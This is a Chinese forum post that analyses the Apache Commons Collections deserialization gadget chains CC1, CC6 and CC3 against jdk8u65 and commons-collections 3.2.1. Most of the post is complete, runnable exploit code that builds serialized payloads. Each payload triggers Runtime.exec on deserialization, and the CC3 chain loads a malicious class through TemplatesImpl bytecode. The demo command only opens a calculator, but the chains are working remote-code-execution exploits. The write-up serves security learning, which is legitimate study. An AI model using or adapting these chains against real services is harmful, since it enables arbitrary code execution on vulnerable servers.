Java CC链全分析

麻花痒  金牌会员 | 2024-5-14 21:01:20 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题
楼主

主题 913|帖子 913|积分 2739

CC链全称CommonsCollections(Java常用的一个库)

梦的开始CC1

情况摆设

JDK版本:jdk8u65
Maven依赖:
  1. <dependencies>
  2.         
  3.         <dependency>
  4.             <groupId>junit</groupId>
  5.             <artifactId>junit</artifactId>
  6.             <version>4.11</version>
  7.             <scope>test</scope>
  8.         </dependency>
  10.         
  11.         <dependency>
  12.             <groupId>commons-collections</groupId>
  13.             <artifactId>commons-collections</artifactId>
  14.             <version>3.2.1</version>
  15.         </dependency>
  16. </dependencies>
复制代码
流程分析

入口:org.apache.commons.collections.Transformer,transform方法有21种实现

入口类:org.apache.commons.collections.functors.InvokerTransformer,它的transform方法使用了反射来调用input的方法,input,iMethodName,iParamTypes,iArgs都是可控的

首先先尝试直接使用invoketransformer来实行命令
  1. package com.f12;
  3. import org.apache.commons.collections.Transformer;
  4. import org.apache.commons.collections.functors.InvokerTransformer;
  6. public class CC1 {
  7.     public static void main(String[] args) {
  8.         new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"}).transform(Runtime.getRuntime());
  9.     }
  10. }
复制代码
成功实行命令

现在的重点就是去找一个别的的类有transform方法,并且传入的Object是可控的,然后我们只要把这个Object设为InvokeTransformer即可,我们全局搜刮transform方法,能够发现很多类都是有transform方法的,我们这里先研究的是CC1,所以我们直接看TransformerMap类

在TransformedMap中的checkSetValue方法中调用了transform,valueTransformer是构造的时候赋的值,再看构造函数

构造函数是一个protected,所以不能让我们直接实例赋值,只能是类内部构造赋值,找那里调用了构造函数

一个静态方法,这里我们就能控制参数了

现在调用transform方法的问题办理了,返回去看checkSetValue,可以看到value我们临时不能控制,全局搜刮checkSetValue,看谁调用了它,并且value值可受控制,在AbstractInputCheckedMapDecorator类中发现,凑巧的是,它刚好是TransformedMap的父类


在这里如果对Java聚集认识一点的人看到了setValue字样就应该想起来,我们在遍历聚集的时候就用过setValue和getValue,所以我们只要对decorate这个map举行遍历setValue,由于TransformedMap继承了AbstractInputCheckedMapDecorator类,因此当调用setValue时会去父类探求,写一个demo来测试一下:
  1. package com.f12;
  3. import org.apache.commons.collections.Transformer;
  4. import org.apache.commons.collections.functors.InvokerTransformer;
  5. import org.apache.commons.collections.map.TransformedMap;
  7. import java.util.HashMap;
  8. import java.util.Map;
  10. public class CC1 {
  11.     public static void main(String[] args) {
  12.         Runtime r = Runtime.getRuntime();
  13.         InvokerTransformer invokerTransformer = new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"});
  14.         HashMap<Object, Object> map = new HashMap<>();
  15.         map.put("1","2");
  16.         Map<Object, Object> decorate = TransformedMap.decorate(map, null, invokerTransformer);
  17.         for(Map.Entry entry:decorate.entrySet()){
  18.             entry.setValue(r);
  19.         }
  20.     }
  21. }
复制代码
成了

我们追踪一下setValue看是在哪调用的,在AnnotationInvocationHandler中找到,而且还是在重写的readObject中调用的setValue,这还省去了再去找readObject
  1.   private void readObject(java.io.ObjectInputStream s)
  2.         throws java.io.IOException, ClassNotFoundException {
  3.         s.defaultReadObject();
  5.         // Check to make sure that types have not evolved incompatibly
  7.         AnnotationType annotationType = null;
  8.         try {
  9.             annotationType = AnnotationType.getInstance(type);
  10.         } catch(IllegalArgumentException e) {
  11.             // Class is no longer an annotation type; time to punch out
  12.             throw new java.io.InvalidObjectException("Non-annotation type in annotation serial stream");
  13.         }
  15.         Map<String, Class<?>> memberTypes = annotationType.memberTypes();
  17.         // If there are annotation members without values, that
  18.         // situation is handled by the invoke method.
  19.         for (Map.Entry<String, Object> memberValue : memberValues.entrySet()) {
  20.             String name = memberValue.getKey();
  21.             Class<?> memberType = memberTypes.get(name);
  22.             if (memberType != null) {  // i.e. member still exists
  23.                 Object value = memberValue.getValue();
  24.                 if (!(memberType.isInstance(value) ||
  25.                       value instanceof ExceptionProxy)) {
  26.                     memberValue.setValue(
  27.                         new AnnotationTypeMismatchExceptionProxy(
  28.                             value.getClass() + "[" + value + "]").setMember(
  29.                                 annotationType.members().get(name)));
  30.                 }
  31.             }
  32.         }
  33.     }
  34. }
复制代码
我们分析下AnnotationInvocationHandler这个类,未用public声明,说明只能通过反射调用

查看一下构造方法,传入一个Class和Map,其中Class继承了Annotation,也就是需要传入一个注解类进去,这里我们选择Target,之后说为什么

构造exp:
  1. package com.f12;
  3. import org.apache.commons.collections.Transformer;
  4. import org.apache.commons.collections.functors.InvokerTransformer;
  5. import org.apache.commons.collections.map.TransformedMap;
  7. import java.lang.annotation.Target;
  8. import java.lang.reflect.Constructor;
  9. import java.lang.reflect.InvocationTargetException;
  10. import java.util.HashMap;
  11. import java.util.Map;
  13. public class CC1 {
  14.     public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException {
  15.         Runtime r = Runtime.getRuntime();
  16.         InvokerTransformer invokerTransformer = new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"});
  17.         HashMap<Object, Object> map = new HashMap<>();
  18.         map.put("1","2");
  19.         Map<Object, Object> decorate = TransformedMap.decorate(map, null, invokerTransformer);
  20. //        for(Map.Entry entry:decorate.entrySet()){
  21. //            entry.setValue(r);
  22. //        }
  23.         Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
  24.         Constructor constructor = c.getDeclaredConstructor(Class.class, Map.class);
  25.         constructor.setAccessible(true);
  26.         Object o = constructor.newInstance(Target.class, decorate);
  27.     }
  28. }
复制代码
现在有个困难是Runtime类是不能被序列化的,但是反射来的类是可以被序列化的,还好InvokeTransformer有一个绝佳的反射机制,构造一下:
  1. Method RuntimeMethod = (Method) new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}).transform(Runtime.class);
  2. Runtime r = (Runtime) new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}).transform(RuntimeMethod);
  3. InvokerTransformer invokerTransformer = new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"});
复制代码
现在还有个小问题,其中我们的transformedmap是传入了一个invokertransformer,但是现在这个对象没有了,被拆成了多个,就是上述四段代码,得想个办法统合起来,这里就回到最初的Transformer接口里去探求,找到ChainedTransformer,刚好这个方法是递归调用数组里的transform方法

我们就可以这样构造:
  1. Transformer[] transformers = new Transformer[]{
  2.     new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
  3.     new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
  4.     new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
  5. };
  6. ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
  7. HashMap<Object, Object> map = new HashMap<>();
  8. map.put("1","2");
  9. Map<Object, Object> decorate = TransformedMap.decorate(map, null, chainedTransformer);
复制代码
到这一步雏形以及可以构造出来了
  1. package com.f12;
  3. import com.sun.xml.internal.ws.encoding.MtomCodec;
  4. import org.apache.commons.collections.Transformer;
  5. import org.apache.commons.collections.functors.ChainedTransformer;
  6. import org.apache.commons.collections.functors.InvokerTransformer;
  7. import org.apache.commons.collections.map.TransformedMap;
  9. import java.io.*;
  10. import java.lang.annotation.Target;
  11. import java.lang.reflect.Constructor;
  12. import java.lang.reflect.InvocationTargetException;
  13. import java.lang.reflect.Method;
  14. import java.util.HashMap;
  15. import java.util.Map;
  16. public class CC1 {
  17.     public static void serialize(Object obj) throws IOException {
  18.         FileOutputStream fos = new FileOutputStream("cc1.bin");
  19.         ObjectOutputStream oos = new ObjectOutputStream(fos);
  20.         oos.writeObject(obj);
  21.     }
  22.     public static void deserialize(String filename) throws IOException, ClassNotFoundException {
  23.         FileInputStream fis = new FileInputStream(filename);
  24.         ObjectInputStream ois = new ObjectInputStream(fis);
  25.         ois.readObject();
  26.     }
  28.     public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException, IOException {
  29.         Transformer[] transformers = new Transformer[]{
  30.             new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
  31.             new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
  32.             new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
  33.         };
  34.         ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
  35.         HashMap<Object, Object> map = new HashMap<>();
  36.         map.put("1","2");
  37.         Map<Object, Object> decorate = TransformedMap.decorate(map, null, chainedTransformer);
  38.         Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
  39.         Constructor constructor = c.getDeclaredConstructor(Class.class, Map.class);
  40.         constructor.setAccessible(true);
  41.         Object o = constructor.newInstance(Target.class, decorate);
  42.         serialize(o);
  43.         deserialize("cc1.bin");
  44.     }
  45. }
复制代码
但是这里反序列化并不能实行命令,why?原因在于AnnotationInvocationHandler里触发setValue是有条件的,我们调试追踪进去看看:

要想触发setValue得先过两个if判断,先看第一个if判断,memberType不能为null,memberType实在就是我们之前传入的注解类Target的一个属性,这个属性那里来的?就是我们最先传入的map  map.put("1","2")
获取这个name:1,获取1这个属性,很明显我们的Target注解类是没有1这个属性的,我们看一下Target类

Target是有value这个属性的,所以我们改一下map,map.put("value", 1),这样就过了第一个if,接着往下看第二个if,这里value只要有值就过了,成功到达setValue,但这里还有末了一个问题,如何让他调用Runtime.class?这里又得提到一个类,ConstantTransformer,这个类的特点就是我们传入啥,它直接就返回啥

这样就能构造终极的exp:
  1. package com.f12;
  3. import com.sun.xml.internal.ws.encoding.MtomCodec;
  4. import org.apache.commons.collections.Transformer;
  5. import org.apache.commons.collections.functors.ChainedTransformer;
  6. import org.apache.commons.collections.functors.ConstantTransformer;
  7. import org.apache.commons.collections.functors.InvokerTransformer;
  8. import org.apache.commons.collections.map.TransformedMap;
  10. import java.io.*;
  11. import java.lang.annotation.Target;
  12. import java.lang.reflect.Constructor;
  13. import java.lang.reflect.InvocationTargetException;
  14. import java.lang.reflect.Method;
  15. import java.util.HashMap;
  16. import java.util.Map;
  17. public class CC1 {
  18.     public static void serialize(Object obj) throws IOException {
  19.         FileOutputStream fos = new FileOutputStream("cc1.bin");
  20.         ObjectOutputStream oos = new ObjectOutputStream(fos);
  21.         oos.writeObject(obj);
  22.     }
  23.     public static void deserialize(String filename) throws IOException, ClassNotFoundException {
  24.         FileInputStream fis = new FileInputStream(filename);
  25.         ObjectInputStream ois = new ObjectInputStream(fis);
  26.         ois.readObject();
  27.     }
  29.     public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException, IOException {
  30.         Transformer[] transformers = new Transformer[]{
  31.             new ConstantTransformer(Runtime.class),
  32.             new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
  33.             new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
  34.             new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
  35.         };
  36.         ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
  37.         HashMap<Object, Object> map = new HashMap<>();
  38.         map.put("value","1");
  39.         Map<Object, Object> decorate = TransformedMap.decorate(map, null, chainedTransformer);
  40.         Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
  41.         Constructor constructor = c.getDeclaredConstructor(Class.class, Map.class);
  42.         constructor.setAccessible(true);
  43.         Object o = constructor.newInstance(Target.class, decorate);
  44.         serialize(o);
  45.         deserialize("cc1.bin");
  46.     }
  47. }
复制代码
成功实行

以上是其中一条CC1,还有另一条CC1,是从LazyMap入手,我们也来分析一下,在LazyMap的get方法里调用了transform

看构造方法,factory需要我们控制,同样在类内部找那里调用了这个构造方法

很明显,跟之前根本相似,就是从checkValue换到了get

那么get在哪调用的,还是在AnnotationInvocationHandler,它的invoke方法调用了get
  1. public Object invoke(Object proxy, Method method, Object[] args) {
  2.         String member = method.getName();
  3.         Class<?>[] paramTypes = method.getParameterTypes();
  5.         // Handle Object and Annotation methods
  6.         if (member.equals("equals") && paramTypes.length == 1 &&
  7.             paramTypes[0] == Object.class)
  8.             return equalsImpl(args[0]);
  9.         if (paramTypes.length != 0)
  10.             throw new AssertionError("Too many parameters for an annotation method");
  12.         switch(member) {
  13.         case "toString":
  14.             return toStringImpl();
  15.         case "hashCode":
  16.             return hashCodeImpl();
  17.         case "annotationType":
  18.             return type;
  19.         }
  21.         // Handle annotation member accessors
  22.         Object result = memberValues.get(member);
  24.         if (result == null)
  25.             throw new IncompleteAnnotationException(type, member);
  27.         if (result instanceof ExceptionProxy)
  28.             throw ((ExceptionProxy) result).generateException();
  30.         if (result.getClass().isArray() && Array.getLength(result) != 0)
  31.             result = cloneArray(result);
  33.         return result;
  34.     }
复制代码
这里是个动态署理,我们可以用AnnotationInvocationHandler来署理LazyMap,这样就会触发invoke方法,构造一下exp(根本大差不差):
  1. package com.f12;
  3. import com.sun.xml.internal.ws.encoding.MtomCodec;
  4. import org.apache.commons.collections.Transformer;
  5. import org.apache.commons.collections.functors.ChainedTransformer;
  6. import org.apache.commons.collections.functors.ConstantTransformer;
  7. import org.apache.commons.collections.functors.InvokerTransformer;
  8. import org.apache.commons.collections.map.LazyMap;
  9. import org.apache.commons.collections.map.TransformedMap;
  11. import java.io.*;
  12. import java.lang.annotation.Target;
  13. import java.lang.reflect.*;
  14. import java.util.HashMap;
  15. import java.util.Map;
  16. public class CC1_LazyMap {
  17.     public static void serialize(Object obj) throws IOException {
  18.         FileOutputStream fos = new FileOutputStream("cc1_lazymap.bin");
  19.         ObjectOutputStream oos = new ObjectOutputStream(fos);
  20.         oos.writeObject(obj);
  21.     }
  22.     public static void deserialize(String filename) throws IOException, ClassNotFoundException {
  23.         FileInputStream fis = new FileInputStream(filename);
  24.         ObjectInputStream ois = new ObjectInputStream(fis);
  25.         ois.readObject();
  26.     }
  28.     public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException, IOException {
  29.         Transformer[] transformers = new Transformer[]{
  30.                 new ConstantTransformer(Runtime.class),
  31.                 new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
  32.                 new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
  33.                 new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
  34.         };
  35.         ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
  36.         HashMap<Object, Object> map = new HashMap<>();
  37.         Map<Object, Object> decorate = LazyMap.decorate(map,  chainedTransformer);
  38.         Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
  40.         Constructor constructor = c.getDeclaredConstructor(Class.class, Map.class);
  41.         constructor.setAccessible(true);
  42.         InvocationHandler handler = (InvocationHandler) constructor.newInstance(Target.class, decorate);
  43.         Map newMap = (Map) Proxy.newProxyInstance(LazyMap.class.getClassLoader(), new Class[]{Map.class}, handler);
  44.         Object o = constructor.newInstance(Target.class, newMap);
  45.         serialize(o);
  46.         deserialize("cc1_lazymap.bin");
  47.     }
  48. }
复制代码
魂牵梦绕CC6

CC6不受jdk版本限定,算是一条最常用的CC链
这是Ysoserial上的CC6,可以看到后半部门没变,从LazyMap.get开始通过TiedMapEntry.getValue来调用了,我们追踪一下

TiedMapEntry.getValue调用了map.get

看构造函数,map,key我们都能控制

找getValue方法在哪调用,TiedMapEntry自身的hashCode方法调用了,看到这个hashCode是不是很眼熟,没错,我们研究URLDNS的时候就是用到这里,那么显而易见,我们前面的就是HashMap了

构造exp,注意这里跟URLDNS有雷同的问题,hashMap.put的时候就触发了hash方法也同时调用了hashCode,所以直接就实行命令了,还是同样的手法将某些值改一下就行了
  1. package com.f12;
  3. import org.apache.commons.collections.Transformer;
  4. import org.apache.commons.collections.functors.ChainedTransformer;
  5. import org.apache.commons.collections.functors.ConstantTransformer;
  6. import org.apache.commons.collections.functors.InvokerTransformer;
  7. import org.apache.commons.collections.keyvalue.TiedMapEntry;
  8. import org.apache.commons.collections.map.LazyMap;
  10. import java.io.*;
  11. import java.lang.reflect.Field;
  12. import java.util.HashMap;
  13. import java.util.Map;
  15. public class CC6 {
  16.     public static void serialize(Object obj) throws IOException {
  17.         FileOutputStream fos = new FileOutputStream("cc6.bin");
  18.         ObjectOutputStream oos = new ObjectOutputStream(fos);
  19.         oos.writeObject(obj);
  20.     }
  21.     public static void deserialize(String filename) throws IOException, ClassNotFoundException {
  22.         FileInputStream fis = new FileInputStream(filename);
  23.         ObjectInputStream ois = new ObjectInputStream(fis);
  24.         ois.readObject();
  25.     }
  27.     public static void main(String[] args) throws IOException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException {
  28.         Transformer[] transformers = new Transformer[]{
  29.             new ConstantTransformer(Runtime.class),
  30.             new InvokerTransformer("getDeclaredMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
  31.             new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
  32.             new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
  33.         };
  34.         ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
  35.         Map<Object, Object> map = new HashMap<>();
  36.         Map<Object, Object> lazymap = LazyMap.decorate(map, new ConstantTransformer(1));
  37.         TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap, null);
  38.         HashMap<Object, Object> hashMap = new HashMap<>();
  39.         hashMap.put(tiedMapEntry, null);
  40.         Field factory = LazyMap.class.getDeclaredField("factory");
  41.         factory.setAccessible(true);
  42.         factory.set(lazymap, chainedTransformer);
  43.         serialize(hashMap);
  44.         deserialize("cc6.bin");
  45.     }
  46. }
复制代码
但是这里奇怪的是还是没法弹计算器,我们调试一下看看,发现是LazyMap.get这里的问题,这里有一个if判断,我们这个map没有给值,在hashMap.put触发后给put进去一个null的键,第二次触发的之前我们把这个键删掉就行了。
  1. package com.f12;
  3. import org.apache.commons.collections.Transformer;
  4. import org.apache.commons.collections.functors.ChainedTransformer;
  5. import org.apache.commons.collections.functors.ConstantTransformer;
  6. import org.apache.commons.collections.functors.InvokerTransformer;
  7. import org.apache.commons.collections.keyvalue.TiedMapEntry;
  8. import org.apache.commons.collections.map.LazyMap;
  10. import java.io.*;
  11. import java.lang.reflect.Field;
  12. import java.util.HashMap;
  13. import java.util.Map;
  15. public class CC6 {
  16.     public static void serialize(Object obj) throws IOException {
  17.         FileOutputStream fos = new FileOutputStream("cc6.bin");
  18.         ObjectOutputStream oos = new ObjectOutputStream(fos);
  19.         oos.writeObject(obj);
  20.     }
  21.     public static void deserialize(String filename) throws IOException, ClassNotFoundException {
  22.         FileInputStream fis = new FileInputStream(filename);
  23.         ObjectInputStream ois = new ObjectInputStream(fis);
  24.         ois.readObject();
  25.     }
  27.     public static void main(String[] args) throws IOException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException {
  28.         Transformer[] transformers = new Transformer[]{
  29.             new ConstantTransformer(Runtime.class),
  30.             new InvokerTransformer("getDeclaredMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
  31.             new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
  32.             new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
  33.         };
  34.         ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
  35.         Map<Object, Object> map = new HashMap<>();
  36.         Map<Object, Object> lazymap = LazyMap.decorate(map, new ConstantTransformer(1));
  37.         TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap, null);
  38.         HashMap<Object, Object> hashMap = new HashMap<>();
  39.         hashMap.put(tiedMapEntry, null);
  40.         map.remove(null);
  41.         Field factory = LazyMap.class.getDeclaredField("factory");
  42.         factory.setAccessible(true);
  43.         factory.set(lazymap, chainedTransformer);
  44.         serialize(hashMap);
  45.         deserialize("cc6.bin");
  46.     }
  47. }
复制代码
ok,拿下CC6
有一说一CC3

CC3就跟前两条链不太一样了,CC1与CC6都是实行命令,而CC3是实行静态代码块,CC3采用的是动态加载类,也就是使用了defineClass,我们搜刮哪些类有defineClass,找到这个TemplatesImpl,这玩意锋利的很,以后还有很多地方用到

继承跟进,在defineTransletClasses方法中调用了defineClass
  1. private void defineTransletClasses()
  2.         throws TransformerConfigurationException {
  4.         if (_bytecodes == null) {
  5.             ErrorMsg err = new ErrorMsg(ErrorMsg.NO_TRANSLET_CLASS_ERR);
  6.             throw new TransformerConfigurationException(err.toString());
  7.         }
  9.         TransletClassLoader loader = (TransletClassLoader)
  10.             AccessController.doPrivileged(new PrivilegedAction() {
  11.                 public Object run() {
  12.                     return new TransletClassLoader(ObjectFactory.findClassLoader(),_tfactory.getExternalExtensionsMap());
  13.                 }
  14.             });
  16.         try {
  17.             final int classCount = _bytecodes.length;
  18.             _class = new Class[classCount];
  20.             if (classCount > 1) {
  21.                 _auxClasses = new HashMap<>();
  22.             }
  24.             for (int i = 0; i < classCount; i++) {
  25.                 _class[i] = loader.defineClass(_bytecodes[i]);
  26.                 final Class superClass = _class[i].getSuperclass();
  28.                 // Check if this is the main class
  29.                 if (superClass.getName().equals(ABSTRACT_TRANSLET)) {
  30.                     _transletIndex = i;
  31.                 }
  32.                 else {
  33.                     _auxClasses.put(_class[i].getName(), _class[i]);
  34.                 }
  35.             }
  37.             if (_transletIndex < 0) {
  38.                 ErrorMsg err= new ErrorMsg(ErrorMsg.NO_MAIN_TRANSLET_ERR, _name);
  39.                 throw new TransformerConfigurationException(err.toString());
  40.             }
  41.         }
  42.         catch (ClassFormatError e) {
  43.             ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_CLASS_ERR, _name);
  44.             throw new TransformerConfigurationException(err.toString());
  45.         }
  46.         catch (LinkageError e) {
  47.             ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);
  48.             throw new TransformerConfigurationException(err.toString());
  49.         }
  50.     }
复制代码
这里有几个判断得注意,首先是_bytecodes不能为null,然后就是_tfactory不能为null,不过_tfactory在readObject方法里被赋值了,因此不用管,继承跟进看谁调用了defineTransletClasses,看getTransletInstance,得绕过第一个if判断,所以得反射赋值给__name

继承跟进看谁调用了getTransletInstance,现在根本有一个构造思路了,new 一个TemplateIml对象,然后调用newTransformer方法,从而去defineClass

由于还没序列化,所以先手动给_tfactory赋值,不过运行后报了个空指针错误
  1. package com.f12;
  3. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
  4. import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
  6. import javax.xml.transform.Transformer;
  7. import javax.xml.transform.TransformerConfigurationException;
  8. import java.io.*;
  9. import java.lang.reflect.Field;
  10. import java.nio.file.Files;
  11. import java.nio.file.Paths;
  13. public class CC3 {
  14.     public static void serialize(Object obj) throws IOException {
  15.         FileOutputStream fos = new FileOutputStream("cc6.bin");
  16.         ObjectOutputStream oos = new ObjectOutputStream(fos);
  17.         oos.writeObject(obj);
  18.     }
  19.     public static void deserialize(String filename) throws IOException, ClassNotFoundException {
  20.         FileInputStream fis = new FileInputStream(filename);
  21.         ObjectInputStream ois = new ObjectInputStream(fis);
  22.         ois.readObject();
  23.     }
  25.     public static void main(String[] args) throws TransformerConfigurationException, NoSuchFieldException, IllegalAccessException, IOException {
  26.         TemplatesImpl templates = new TemplatesImpl();
  27.         Field _name = TemplatesImpl.class.getDeclaredField("_name");
  28.         _name.setAccessible(true);
  29.         _name.set(templates, "1");
  30.         Field _bytecodes = TemplatesImpl.class.getDeclaredField("_bytecodes");
  31.         _bytecodes.setAccessible(true);
  32.         byte[] bytes = Files.readAllBytes(Paths.get("D:\\Java安全学习\\CC1\\target\\classes\\com\\f12\\Eval.class"));
  33.         byte[][] code = {bytes};
  34.         _bytecodes.set(templates, code);
  35.         Field _tfactory = TemplatesImpl.class.getDeclaredField("_tfactory");
  36.         _tfactory.setAccessible(true);
  37.         _tfactory.set(templates, new TransformerFactoryImpl());
  38.         Transformer transformer = templates.newTransformer();
  39.     }
  40. }
复制代码
  1. package com.f12;
  3. import java.io.IOException;
  5. public class Eval {
  6.     static {
  7.         try {
  8.             Runtime.getRuntime().exec("calc");
  9.         } catch (IOException e) {
  10.             throw new RuntimeException(e);
  11.         }
  12.     }
  14.     public static void main(String[] args) {
  16.     }
  17. }
复制代码
调试发现在这由于if判断没过,导致进去这个空指针错误,继承反射修改ABSTRACT_TRANSLET的值就ok,或则让恶意类Eval继承这个ABSTRACT_TRANSLET所指向的类

成功弹出计算器
  1. package com.f12;
  3. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
  4. import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
  6. import javax.xml.transform.Transformer;
  7. import javax.xml.transform.TransformerConfigurationException;
  8. import java.io.*;
  9. import java.lang.reflect.Field;
  10. import java.nio.file.Files;
  11. import java.nio.file.Paths;
  13. public class CC3 {
  14.     public static void serialize(Object obj) throws IOException {
  15.         FileOutputStream fos = new FileOutputStream("cc6.bin");
  16.         ObjectOutputStream oos = new ObjectOutputStream(fos);
  17.         oos.writeObject(obj);
  18.     }
  19.     public static void deserialize(String filename) throws IOException, ClassNotFoundException {
  20.         FileInputStream fis = new FileInputStream(filename);
  21.         ObjectInputStream ois = new ObjectInputStream(fis);
  22.         ois.readObject();
  23.     }
  25.     public static void main(String[] args) throws TransformerConfigurationException, NoSuchFieldException, IllegalAccessException, IOException {
  26.         TemplatesImpl templates = new TemplatesImpl();
  27.         Field _name = TemplatesImpl.class.getDeclaredField("_name");
  28.         _name.setAccessible(true);
  29.         _name.set(templates, "1");
  30.         Field _bytecodes = TemplatesImpl.class.getDeclaredField("_bytecodes");
  31.         _bytecodes.setAccessible(true);
  32.         byte[] bytes = Files.readAllBytes(Paths.get("D:\\Java安全学习\\CC1\\target\\classes\\com\\f12\\Eval.class"));
  33.         byte[][] code = {bytes};
  34.         _bytecodes.set(templates, code);
  35.         Field _tfactory = TemplatesImpl.class.getDeclaredField("_tfactory");
  36.         _tfactory.setAccessible(true);
  37.         _tfactory.set(templates, new TransformerFactoryImpl());
  38.         Field ABSTRACT_TRANSLET = TemplatesImpl.class.getDeclaredField("ABSTRACT_TRANSLET");
  39.         ABSTRACT_TRANSLET.setAccessible(true);
  40.         ABSTRACT_TRANSLET.set(templates, "java.lang.Object");
  41.         Transformer transformer = templates.newTransformer();
  42.     }
  43. }
复制代码
末了的问题是如何去序列化,可以看到Transformer这个类,我们可以结合CC1或者CC6
  1. package com.f12;
  3. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
  4. import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
  5. import org.apache.commons.collections.Transformer;
  6. import org.apache.commons.collections.functors.ChainedTransformer;
  7. import org.apache.commons.collections.functors.ConstantTransformer;
  8. import org.apache.commons.collections.functors.InvokerTransformer;
  9. import org.apache.commons.collections.map.LazyMap;
  11. import java.io.*;
  12. import java.lang.annotation.Target;
  13. import java.lang.reflect.*;
  14. import java.nio.file.Files;
  15. import java.nio.file.Paths;
  16. import java.util.HashMap;
  17. import java.util.Map;
  19. public class CC3 {
  20.     public static void serialize(Object obj) throws IOException {
  21.         FileOutputStream fos = new FileOutputStream("cc3.bin");
  22.         ObjectOutputStream oos = new ObjectOutputStream(fos);
  23.         oos.writeObject(obj);
  24.     }
  25.     public static void deserialize(String filename) throws IOException, ClassNotFoundException {
  26.         FileInputStream fis = new FileInputStream(filename);
  27.         ObjectInputStream ois = new ObjectInputStream(fis);
  28.         ois.readObject();
  29.     }
  31.     public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException {
  32.         TemplatesImpl templates = new TemplatesImpl();
  33.         Field _name = TemplatesImpl.class.getDeclaredField("_name");
  34.         _name.setAccessible(true);
  35.         _name.set(templates, "1");
  36.         Field _bytecodes = TemplatesImpl.class.getDeclaredField("_bytecodes");
  37.         _bytecodes.setAccessible(true);
  38.         byte[] bytes = Files.readAllBytes(Paths.get("D:\\Java安全学习\\CC1\\target\\classes\\com\\f12\\Eval.class"));
  39.         byte[][] code = {bytes};
  40.         _bytecodes.set(templates, code);
  41.         Field _tfactory = TemplatesImpl.class.getDeclaredField("_tfactory");
  42.         _tfactory.setAccessible(true);
  43.         _tfactory.set(templates, new TransformerFactoryImpl());
  44.         Field ABSTRACT_TRANSLET = TemplatesImpl.class.getDeclaredField("ABSTRACT_TRANSLET");
  45.         ABSTRACT_TRANSLET.setAccessible(true);
  46.         ABSTRACT_TRANSLET.set(templates, "java.lang.Object");
  47. //        Transformer transformer = templates.newTransformer();
  48.         Transformer[] transformers = new Transformer[]{
  49.                 new ConstantTransformer(templates),
  50.                 new InvokerTransformer("newTransformer", null, null)
  51.         };
  52.         ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
  53.         HashMap<Object, Object> map = new HashMap<>();
  54.         Map<Object, Object> decorate = LazyMap.decorate(map,  chainedTransformer);
  55.         Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
  56.         Constructor constructor = c.getDeclaredConstructor(Class.class, Map.class);
  57.         constructor.setAccessible(true);
  58.         InvocationHandler handler = (InvocationHandler) constructor.newInstance(Target.class, decorate);
  59.         Map newMap = (Map) Proxy.newProxyInstance(LazyMap.class.getClassLoader(), new Class[]{Map.class}, handler);
  60.         Object o = constructor.newInstance(Target.class, newMap);
  61.         serialize(o);
  62.         deserialize("cc3.bin");
  63.     }
  64. }
复制代码
